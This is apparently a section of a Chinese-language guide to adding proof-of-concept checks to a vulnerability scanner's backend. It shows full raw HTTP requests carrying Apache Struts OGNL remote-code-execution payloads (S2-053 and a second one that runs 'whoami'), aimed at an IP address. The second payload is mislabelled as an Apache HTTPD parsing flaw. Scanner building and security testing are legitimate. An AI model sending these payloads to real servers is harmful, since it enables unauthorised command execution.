2.补充漏洞POC(服务端后台)

目前仅支持单步的请求包POC补充

Struts S2-053 rce为例 补充Content-Type为form格式的漏洞


burpsuite的请求包中 我们最终精简我们的请求为

POST /hello.action HTTP/1.1
Host: 43.138.83.231:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 981

redirectUri=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27ifconfig%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew+java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D%0D%0A

结构分为以下部分

Headers(请求头 不包含cookies、content-type)
Cookies(请求cookies)
Method (请求方法)
Content-type (content类型)
Body(请求body)
Path(请求路径)
TestDomain(存在漏洞的测试域名 非必选 方便调试)

进入后台 点击poc列表->添加

通过请求包比对 把每个部分的东西都填写进添加框


特殊情况:Apache HTTPD 多后缀解析漏洞为例 补充Content-Type为form格式的漏洞

漏洞请求包为:

POST /index.action HTTP/1.1
Host: 43.138.83.231:8080
Content-Type: multipart/form-data; boundary=----b72256eb77cf961977440f8c972d92a2
Content-Length: 827

------b72256eb77cf961977440f8c972d92a2
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------b72256eb77cf961977440f8c972d92a2--

添加内容:

(内容类型为file  body为请求包body全部部分)


(需要注意的是 你可以在添加漏洞的时候 就把boundary后面的值改成统一标准 b72256eb77cf961977440f8c972d92a2

当请求漏洞需要增加默认Header、默认Cookie


当请求包 没有这两个token的header就无法使用时 在指定内容第二个框添加(多个间用;隔开)


当请求包没有这个cookie时就无法使用时 在指定内容的第一个框添加(多个cookie键值对用;隔开)